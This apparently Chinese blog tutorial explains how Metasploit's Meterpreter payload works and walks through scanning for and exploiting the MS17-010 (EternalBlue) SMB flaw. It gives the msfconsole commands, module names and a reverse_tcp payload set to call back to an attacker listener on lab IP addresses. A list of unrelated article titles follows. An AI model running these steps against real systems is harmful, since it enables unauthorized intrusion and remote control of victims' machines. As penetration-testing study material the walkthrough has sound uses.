当前位置：首页 > news >正文

Meterpreter工具使用

news 2025/11/9 15:01:32

Meterpreter属于stage payload，在Metasploit Framework中，Meterpreter是一种后渗透工具，它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的，它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。

Meterpreter是如何工作的？

首先目标先要执行初始的溢出漏洞会话连接，可能是 bind正向连接，或者反弹 reverse 连接。反射连接的时候加载dll链接文件，同时后台悄悄处理 dll 文件。其次Meterpreter核心代码初始化,通过 socket套接字建立一个TLS/1.0加密隧道并发送GET请求给Metasploit服务端。Metasploit服务端收到这个GET请求后就配置相应客户端。最后，Meterpreter加载扩展，所有的扩展被加载都通过TLS/1.0进行数据传输。

Meterpreter的特点：

Meterpreter完全驻留在内存，没有写入到磁盘

Meterpreter注入的时候不会产生新的进程，并可以很容易的移植到其它正在运行的进程

默认情况下， Meterpreter的通信是加密的，所以很安全

扩展性，许多新的特征模块可以被加载。

我们在设置 payloads 时，可以将 payloads 设置为：windows/meterpreter/reverse_tcp ，然后获得了 meterpreter> 之后我们就可以干很多事了！

MS17_010(永恒之蓝)

我们现在模拟使用 MS17_010 漏洞攻击，这个漏洞就是去年危害全球的勒索病毒利用的永恒之蓝漏洞。 kali控制台输入：msfconsole 进入metasploit框架

寻找MS17_010漏洞： search ms17_010

这里找到了两个模块，第一个辅助模块是探测主机是否存在MS17_010漏洞，第二个是漏洞利用模块，我们先探测哪些主机存在漏洞

辅助模块(探测模块）

输入命令：use auxiliary/scanner/smb/smb_ms17_010

查看这个模块需要配置的信息：show options

RHOSTS 参数是要探测主机的ip或ip范围，我们探测一个ip范围内的主机是否存在漏洞输入：set RHOSTS ip地址

输入：exploit 攻击，这里有+号的就是可能存在漏洞的主机

漏洞利用模块

然后我们就可以去利用漏洞攻击了，选择漏洞攻击模块：

use exploit/windows/smb/ms17_010_eternalblue

查看这个漏洞的信息：info

查看可攻击的系统平台，这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统：show targets

这里只有一个，有些其他的漏洞模块对操作系统的语言和版本要求的很严，比如MS08_067，这样就要我们指定目标系统的版本的。如果不设置的话，MSF会自动帮我们判断目标操作系统的版本和语言(利用目标系统的指纹特征)

查看攻击载荷：show payloads

设置攻击载荷：set payload windows/x64/meterpreter/reverse_tcp

查看模块需要配置的参数： show options

设置RHOST，也就是要攻击主机的ip：set RHOST 192.168.125.138

设置LHOST，也就是我们主机的ip，用于接收从目标机弹回来的shell：set LHOST 192.168.125.129

如果我们这里不设置lport的话，默认是4444端口监听

攻击： exploit

Meterpreter工具使用

相关文章：

Meterpreter工具使用

第四讲单片机STC89C52+RA8889代码移植范例（包含API接口）

QT 音乐播放器【一】显示音频级别指示器

【MATLAB源码-第220期】基于matlab的Massive-MIMO误码率随着接收天线变化仿真采用ZF均衡和QPSK调制。

【前端】政务服务大数据可视化监控平台（源码+html+css+js）

【网关】工业智能网关-02

【C语言】动态内存管理技术文档

低空经济的意义所在

DNF手游攻略：0氪攻略，转职技巧与避坑指南！

周报 | 24.5.27-24.6.2文章汇总

【C++初阶学习】第十二弹——stack和queue的介绍和使用

nginx反向代理了解

插入排序和希尔排序

Java web应用性能分析之【java进程问题分析定位】

c#控件笔记

STM32-15-DMA

Go语言几种常见的IO模型用法和 netpoll与原生GoNet对比

大米cms安装支付逻辑漏洞

使用 zxing 生成二维码以及条形码

发布 jar 包到 maven 中央仓库

R语言AI模型部署方案：精准离线运行详解

中南大学无人机智能体的全面评估！BEDI：用于评估无人机上具身智能体的综合性基准测试

uni-app学习笔记二十二---使用vite.config.js全局导入常用依赖

[Java恶补day16] 238.除自身以外数组的乘积

JVM暂停（Stop-The-World，STW）的原因分类及对应排查方案

【前端异常】JavaScript错误处理：分析 Uncaught (in promise) error

mac：大模型系列测试

DeepSeek源码深度解析 × 华为仓颉语言编程精粹——从MoE架构到全场景开发生态

水泥厂自动化升级利器：Devicenet转Modbus rtu协议转换网关

快速排序算法改进:随机快排-荷兰国旗划分详解